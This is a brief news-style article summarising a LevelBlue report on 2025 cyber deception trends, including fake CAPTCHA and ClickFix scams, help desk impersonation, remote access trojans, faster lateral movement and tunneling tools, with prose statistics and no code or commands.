Exploring Cyber Deception Threat Trends of 2025: From Fake CAPTCHAs to Remote Access Trojans (RATs)

Cybercriminals are becoming increasingly adept at deception, as highlighted in a recent LevelBlue report. Attackers are utilising social engineering techniques and legitimate tools to navigate through environments undetected. The report indicates a significant rise in the number of customers affected by security incidents, which nearly tripled from 6 per cent in late 2024 to 17 per cent in early 2025. More than half of these incidents originated at the initial access stage. Once attackers gained entry, they acted swiftly, with the average time between compromise and lateral movement dropping below 60 minutes, and in some instances, taking less than 15 minutes. This rapid movement is facilitated by the continued use of familiar tools, such as Remote Desktop Protocol, which remains the most common method for transitioning between systems.

The report also notes a concerning trend in the sophistication of threat actors. Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, remarked on the evolution beyond traditional Business Email Compromise (BEC) schemes. Attackers are now employing targeted social engineering tactics to manipulate users into granting access. Once inside, they deploy Remote Access Trojans and quickly erase their tracks, enabling them to traverse networks with alarming speed. While BEC still accounts for the largest share of initial access at 57 per cent, this figure has decreased from 74 per cent in the previous reporting period. The decline correlates with a sharp increase in fake CAPTCHA scams and help desk impersonation, with social engineering now constituting 39 per cent of initial access methods. The ClickFix campaign exemplifies this trend, where users are deceived into executing a PowerShell command that downloads malware, resulting in a staggering 1,400 per cent increase in related activity over six months. Once inside, attackers rely on a combination of Remote Monitoring and Management tools and tunneling techniques to maintain access, using tools like Plink and Ngrok to create covert connections that blend seamlessly with normal IT operations, making detection by defenders increasingly challenging. 

Categories: Cybersecurity Threats, Social Engineering Tactics, Remote Access Tools 

Tags: Cybercriminals, Social Engineering, Remote Desktop Protocol, Lateral Movement, RMM Software, Tunneling Utilities, Business Email Compromise, CAPTCHA Scams, Remote Access Trojans, Malware